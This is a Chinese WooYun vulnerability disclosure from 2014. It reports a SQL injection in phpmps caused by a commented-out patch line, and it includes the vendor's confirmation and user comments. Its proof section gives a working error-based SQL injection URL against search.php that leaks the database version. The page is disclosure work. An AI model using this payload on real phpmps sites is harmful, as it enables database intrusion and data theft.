当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078413

漏洞标题:phpmps补丁出错导致注入漏洞

相关厂商:phpmps.com

漏洞作者: 玉林嘎

提交时间:2014-10-06 10:58

修复时间:2015-01-04 11:00

公开时间:2015-01-04 11:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-06: 细节已通知厂商并且等待厂商处理中
2014-10-07: 厂商已经确认,细节仅向厂商公开
2014-10-10: 细节向第三方安全合作伙伴开放
2014-12-01: 细节向核心白帽子及相关领域专家公开
2014-12-11: 细节向普通白帽子公开
2014-12-21: 细节向实习白帽子公开
2015-01-04: 细节向公众公开

简要描述:

补丁太秀逗了

详细说明:

WooYun: phpmps弱过滤导致注入漏洞
这是上一个爆出的漏洞
问题出在 foreach数组中 key未做过滤 导致的注入
在官网下载了最新版本对照一看 逗死我了

11.jpg


最后更新 应该是指版本吧 看补丁就知道有在修复了

12.jpg


$data = read_cache('custom');
//$cusid = intval($cusid);
if($data===false) {


//$cusid = intval($cusid);这个就是针对上次漏洞的补丁的修复
但是 你注释他干么啊。。。。

漏洞证明:

demo已复现但不知道demo是否最新版 本地搭建一个复现
http://127.0.0.1/phpmps/search.php
?custom[xss') AND (SELECT 8734 FROM(SELECT COUNT(*),CONCAT(@@version,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)#]=1
返回信息,成功获取版本信息

13.jpg

修复方案:

别秀逗了
代码审计处子秀 忘通过

版权声明:转载请注明来源 玉林嘎@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-10-07 17:21

厂商回复:

thank you !!

最新状态:

暂无


漏洞评价:

评论

  1. 2014-10-06 19:31 | Walle ( 路人 | Rank:0 漏洞数:5 | ... 位卑、未敢忘忧国! ...)

    尼玛、乍一看还以为是phpcms呢、、

  2. 2014-10-06 20:35 | kill ( 路人 | Rank:4 漏洞数:5 | >-<)

    @Walle 你不说我都没发现

  3. 2014-10-06 20:36 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    @kill @Walle 欺骗成功~~

  4. 2014-10-28 00:05 | 郭斯特 ( 普通白帽子 | Rank:181 漏洞数:69 | GhostWin)

    @玉林嘎 求企鹅交流~